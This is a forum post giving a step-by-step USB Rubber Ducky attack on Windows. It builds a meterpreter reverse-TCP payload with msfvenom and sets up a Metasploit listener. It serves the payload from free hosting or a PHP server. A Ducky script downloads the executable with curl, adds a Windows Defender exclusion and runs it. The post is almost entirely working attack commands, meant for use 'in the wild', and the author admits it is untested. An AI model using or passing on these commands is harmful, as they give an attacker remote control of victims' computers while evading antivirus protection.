Jump to content

USB rubber duck (single stage) *Takes less then half a second*


Recommended Posts

So  the last time I did this I hosted the payload on a server on my pc, now you can just use 

port forward 8888 (If you plan on using this in the wild)

Create the payload

cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe

Host the Payload on 000webhost.com (Just make an account and upload the payload using the file manager). 

Start your listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j -z

So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds 

NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip)

ports that need to be port forwarded 8888 & 8080

Heres the setup proc: (I use parrot sec os)

Create the payload

cd ~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe

Start the PHP server

sudo php -S 0.0.0.0:8080 -t ~

Start your listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST <your public ip>
set LPORT 8888
set ExitOnSession false
exploit -j -z

Heres The Ducky Script

DELAY 350 
GUI r 
DELAY 100
STRING cmd /c "curl -o 'C:\users\exploit.exe' 'https:URL\exploit.exe' && powershell Add-MpPreference -ExclusionPath 'C:\users' && C:\users\exploit.exe"
ENTER

Please comment if there are any problems I Havent tested this yet! But it practically happens instantly............

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...